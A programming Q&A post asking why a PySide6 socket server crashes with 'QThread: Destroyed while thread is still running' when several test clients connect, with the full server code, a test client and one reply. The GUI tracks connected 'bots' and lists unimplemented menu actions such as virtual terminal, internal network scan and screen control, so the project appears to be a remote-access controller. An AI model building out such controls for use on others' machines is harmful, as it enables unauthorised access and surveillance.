# pyside6 QThread:unexpect quit

Tags: python, user-interface, pyside6

```
from PySide6.QtWidgets import QApplication, QMainWindow, QTableWidget, QTableWidgetItem, QGraphicsDropShadowEffect,QMenu
from damn import Ui_MainWindow
from PySide6.QtGui import *
from PySide6.QtCore import *
from datetime import datetime
from time import sleep
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import padding
import base64
import threading
import socket




class ClientThread(QThread):
    new_client_signal = Signal(list)
    

    def __init__(self, clientsocket, addr):
        super().__init__()
        self.clientsocket = clientsocket
        self.addr = addr

    def run(self):


        currentDateAndTime = datetime.now()
        currentTime = currentDateAndTime.strftime("%H:%M:%S")
        self.clientsocket.send(b"OK")
        message = self.clientsocket.recv(2048).decode()
        print(message)
        detail = message.strip().split("<===>")
        self.new_client_signal.emit([detail[0], detail[1], detail[2], detail[3], detail[4],currentTime,detail[5],detail[6],-1,self.clientsocket])
        print("傻子上线地址: %s" % str(self.addr))
        self.row = client_list[self.clientsocket]
        empty = 0
        
        while 1:
            try:
                self.clientsocket.send(b"detail")
                self.clientsocket.settimeout(10)
                message = self.clientsocket.recv(2048).decode()


                detail = message.strip().split("<===>")
                self.new_client_signal.emit([detail[0], detail[1], detail[2], detail[3], detail[4],currentTime,detail[5],detail[6],self.row])
            except:
                
                mainWindow.client_table.removeRow(self.row)
                client_list.pop(self.clientsocket)
                self.clientsocket.close()
                break
      
class MainWindow(QMainWindow, Ui_MainWindow):
    current_row_index = 0
    
    def __init__(self):
        super().__init__()
        self.setupUi(self)
        # 移除外框
        self.setWindowFlag(Qt.FramelessWindowHint)
        self.client_table.setContextMenuPolicy(Qt.CustomContextMenu)
        self.client_table.customContextMenuRequested.connect(self.bot_function_list)
        self.shadow = QGraphicsDropShadowEffect()  # 设定一个阴影,半径为10,颜色为#444444,定位为0,0
        self.shadow.setBlurRadius(10)
        self.shadow.setColor(QColor("#444444"))
        self.shadow.setOffset(0, 0)
        self.client_table.setGraphicsEffect(self.shadow)
        self.client_table.setRowCount(13)
        self.IP.setText(get_host_ip())
        self.utime = threading.Thread(target=self.update_time)
        self.exit.clicked.connect(self.close)
        self.oringle_row_cout = self.client_table.rowCount()
    #右鍵菜單
    def bot_function_list(self,pos):
        row_num = -1
        for i in self.client_table.selectionModel().selection().indexes():
            row_num = i.row()

        if row_num < 500: # 表格生效的行数，501行点击右键，不会弹出菜单
            menu = QMenu() #实例化菜单   
            Vterminal = menu.addAction(u"虚拟终端")
            internalscan = menu.addAction(u"内网扫描")
            systeminfo = menu.addAction(u"获取系统信息")
            processcron = menu.addAction(u"进程操作")
            screencron = menu.addAction(u"屏幕控制")
            action = menu.exec_(self.client_table.mapToGlobal(pos))

    #顯示時間
    def update_time(self):
        while status == 1:
            currentDateAndTime = datetime.now()
            currentTime = currentDateAndTime.strftime("%H:%M:%S")
            self.currenttime.setText(currentTime)
            sleep(1)
    #移動窗口
    def mousePressEvent(self, event):
        try:
            if event.button() == Qt.LeftButton:
                self.m_flag = True
                self.m_Position = event.globalPos() - self.pos()
                event.accept()
            elif event.button() == Qt.RightButton:
                self.m_flag = False
        except:
            pass

    def mouseMoveEvent(self, QMouseEvent):
        try:
            if Qt.LeftButton and self.m_flag:
                self.move(QMouseEvent.globalPos() - self.m_Position)
                QMouseEvent.accept()
        except:
            pass

    def mouseReleaseEvent(self, QMouseEvent):
        try:
            self.m_flag = False
        except:
            pass


    #添加數據
    def add(self,data):
        
        
        if data[8] == -1:
            del data[8]
            
            self.client_table.setRowCount(self.oringle_row_cout + 1)
            n = 0
            for i in range(self.oringle_row_cout):
                
                if self.client_table.item(i,0) == None:
                    break
                elif self.client_table.item(i,0).text() == "":
                    break
                else:
                    n=n+1
            
            client_list.update({data[8]:n})
            del data[8]
            for i, item in enumerate(data):
                self.client_table.setItem(n, i, QTableWidgetItem(item))
            self.oringle_row_cout = self.oringle_row_cout + 1
            
            
            
        else:
            print(data)
            row = data[8]
            del data[8]
            
            for i, item in enumerate(data):
                self.client_table.setItem(row, i, QTableWidgetItem(""))
            self.oringle_row_cout = self.oringle_row_cout + 1
            
        
        


client_list = {}


class ServerThread(QThread):
    def run(self):
        serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        serversocket.bind(("0.0.0.0", 9876))
        serversocket.listen(999999)
        while True:
            clientsocket, addr = serversocket.accept()
            self.client_thread = ClientThread(clientsocket, addr)
            self.client_thread.new_client_signal.connect(mainWindow.add)
            self.client_thread.start()


app = QApplication([])
mainWindow = MainWindow()

status = 1
if __name__ == "__main__":
    server_thread = ServerThread()
    server_thread.start()
    mainWindow.utime.start()
    mainWindow.show()
    
    app.exec()

    server_thread.terminate()
    status = 0
```

here is my testing program

```
# TCPclient.py

import socket
import time
target_host = "127.0.0.1" #服务器端地址
target_port = 9876  #必须与服务器的端口号一致



client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

client.connect((target_host,target_port))   
response = client.recv(1024)

print(response)

client.send(b"COSJDASO<========>LOAD==")
response = client.recv(1024)
print(response)
client.send(b"1<===>2<===>3<===>4<===>5<===>6<===>7<===>")
time.sleep(4)
client.close()
```

OK
while i run testing program 1by1.it work properly,it wait and the next item add to the empty row.But when i do sth like multi process,i crash and tell me QThread: Destroyed while thread is still running

bruh

what i expact is when socket connect it add sth in the table while it disconnect remove it

Comment: Please explain what you mean by "when i do sth like multi process". Also, both the QApplication and main window creation should be moved in the `if __name__` block.